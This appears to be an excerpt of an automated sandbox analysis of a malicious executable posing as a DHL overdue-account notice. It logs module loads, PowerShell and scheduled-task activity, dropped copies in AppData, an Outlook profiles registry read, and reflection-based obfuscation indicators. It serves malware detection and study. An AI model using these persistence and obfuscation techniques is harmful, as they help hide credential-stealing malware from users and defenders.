                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: oZr.pdb source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr, LJAGvecDW.exe.1.dr
                      Source: Binary string: System.Data.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: Accessibility.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.pdbx source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000012.00000000.2398561366.0000000000F92000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                      Source: Binary string: oZr.pdb> source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.pdb(N source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000012.00000000.2398561366.0000000000F92000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                      Source: Binary string: System.Data.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Configuration.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.pdbH source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Windows.Forms.pdbPq source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Drawing.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Xml.pdb< source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: System.Core.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.pdbMZ source: WER6D7D.tmp.dmp.12.dr
                      Source: Binary string: Accessibility.pdb< source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Drawing.pdb$ source: WER93E1.tmp.dmp.22.dr
                      Source: Binary string: oZr.pdbSHA2560Q source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe, LJAGvecDW.exe.1.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Data.pdb, source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.ni.pdb source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER6D7D.tmp.dmp.12.dr, WER93E1.tmp.dmp.22.dr

                      Data Obfuscation

                      barindex
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pG8amSqlnJ4quD2sgH.cs.Net Code: jtYClDwqj2 System.Reflection.Assembly.Load(byte[])
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: 0xF3ED4585 [Sun Sep 6 21:28:37 2099 UTC]
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_07343E3A push ds; ret 1_2_07343E3B
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeCode function: 1_2_078F7E88 pushad ; iretd 1_2_078F7E91
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0652FD30 push es; ret 9_2_0652FD40
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_04D37E88 pushad ; iretd 13_2_04D37E91
                      Source: C:\Users\user\AppData\Roaming\LJAGvecDW.exeCode function: 13_2_06DB3E3A push ds; ret 13_2_06DB3E3B
                      Source: DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeStatic PE information: section name: .text entropy: 7.954566370427042
                      Source: LJAGvecDW.exe.1.drStatic PE information: section name: .text entropy: 7.954566370427042
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, FQjI6xswpurevFyFrHc.csHigh entropy of concatenated method names: 'TaR04YGBWa', 'JE60rW2lwN', 'x9P0loTJFg', 'j2Y061B2Pm', 'WTS0jrC5Di', 'sb30fHsMys', 'YRg0b1cPQP', 'Tbv0JUSP9m', 'UiK0csHUtB', 'BKM0kRrSva'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, j8KIOynUvUE6avXM9q.csHigh entropy of concatenated method names: 'a5cE5JhV0y', 'O0kEmuusm4', 'NBpE8McgXp', 'xmV8tuZ00P', 'ehL8zTgoyZ', 'OE3Ewt6Rq7', 'nkZEsWa06H', 'MPvEgOPMra', 'kWdEKmUiy2', 'q7BECOE50G'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, aUXYCqtwfT655GPHKy.csHigh entropy of concatenated method names: 'V4I0ssK2j6', 'iqG0KvbGnL', 'Eas0CMhmiU', 'srF05XMIo2', 'ybG0uKyBeB', 'fO10MO0xMx', 'INM08CaMx7', 'W0iNYBZ60E', 'fTGNHJ7mbu', 'MLfNdXwkB2'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, BO2pWNVo2dQDk4L5AL.csHigh entropy of concatenated method names: 'i1R8URcB7n', 'cps8ukfh0q', 'vmd8MUCSRh', 'Maw8Ees7oi', 'MeP8qYbdyf', 'DFqMxM5lU4', 'EnLMBqq6Lf', 'TkKMYEBqnZ', 'FqvMHdCBsV', 'cBdMdmYaBa'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pG8amSqlnJ4quD2sgH.csHigh entropy of concatenated method names: 'g3kKUEi0kL', 'EexK5Km5BK', 'hiSKu5l7US', 'BPuKmFvxLr', 'pLNKMUCu0E', 'PHdK8hPbmC', 'rV8KEXanZx', 'zaqKqEUHg5', 'Y3YKyGuJ3v', 'VsLKpoNoV9'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, Dyi1eossp9DjXPSKtmZ.csHigh entropy of concatenated method names: 'ToString', 'aBMDKU3YAH', 'IcqDC9B0d4', 'AjoDUZ9FWQ', 'zwWD5OtHYM', 'CDqDucI4pk', 'Wg0DmbYfL4', 'undDME2mdO', 'GNBuZcrBmeyVPIG4W4P', 'WtkCH8rIx9p0wrbp1N2'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, SSUKlkc9axQbVVUYQj.csHigh entropy of concatenated method names: 'tSJm60lQ9B', 'qGcmfS55yP', 'YRamJljIdl', 'QosmcyP9YV', 'qs4mvd59Yf', 'Hu3mGlCk1g', 'NtvmFubWBr', 'NjbmNXq5pc', 'eQIm0cXkp6', 'Im6mDSFvlU'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, PMN4xKPUAJtFCI5QgV.csHigh entropy of concatenated method names: 'Fu8FpBnCt7', 't1UFXh190g', 'ToString', 'oeHF5qxWuY', 'fBcFuPQYwZ', 'sGLFmT9aSf', 'OpDFMsvEFD', 'LwDF8juNLg', 'WM4FEdQm9c', 'f83FqpcH9E'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, wg8p4uLkAXM2VBKjl5.csHigh entropy of concatenated method names: 'ToString', 'qVSGWr5qJ9', 'tAAGeW69dc', 'rlFGSqraJc', 'KT1GIYlwrZ', 'rSGGAwI2GA', 'mjsG7hpvF8', 'YR3Gn0Qkx3', 'q9kGZ9DhNU', 'nLMG1WVoex'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, tl2aMA934ntNhTkLCI.csHigh entropy of concatenated method names: 'RLmvaCp025', 'jiKvRlZVVZ', 'VVyv9N3jeP', 'mAwvTjl3i8', 'oZXvemKQLp', 'CuqvS8OCnQ', 'G40vIdTJJ1', 'twavAQASWN', 'KP1v74Ofux', 'JkHvnb6exE'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, T4WMKYhPVCAIdTeZWR.csHigh entropy of concatenated method names: 'H8O3JpoJpZ', 'oca3cT660v', 'Yyg3VCU5ql', 'dxL3ebfctR', 'CSw3IhRwdU', 'o2R3AIjGTJ', 'bh73nDb7gi', 'TdC3ZlfnGw', 'Si63aXytfh', 'f3J3Wau9kV'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, FUNVgrCo3A2OAg79xZ.csHigh entropy of concatenated method names: 'q5tsE5gZfk', 'nWvsqeVrln', 'E9aspxQbVV', 'eYQsXjC67H', 'xdosvV5fO2', 'mWNsGo2dQD', 'uVaqmUQNJ5sB4IKWet', 'xR8HX1iPMaxy2RjvWO', 'aYasswksxX', 'LuUsKRu6hY'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, d67HrGkKQkART4doV5.csHigh entropy of concatenated method names: 'ITrMjXGD6v', 'rRjMbiCYl5', 'U4umSpdWRi', 'MLYmIMhHwa', 'avmmAwi1GJ', 'wX0m7HpXcQ', 'JpFmnEGnAo', 'sgCmZDo0yf', 'TaNm17Ynmj', 'mLSma8g9DN'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, TRjKYPgmr4NNIidoLj.csHigh entropy of concatenated method names: 'yi1lfgMB2', 'VlY62I1Vv', 'fRffswoGl', 'DP7bhYhYD', 'gcHcW3x80', 'J5GkehBHH', 'UHdoQLfGlDFexkPWVW', 'tdkknV4RIKC0xLVZlg', 'eYxN2VaHh', 'WTuDG1xpL'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, Pnsbg1sK7lr0S11sX87.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OqgD9QjnaM', 'PjrDTiwK7C', 'vTkDLqoyn1', 'ztUDPyVqqD', 'aMaDxrKTfZ', 'NSlDBACiEL', 'tC8DY0OTop'
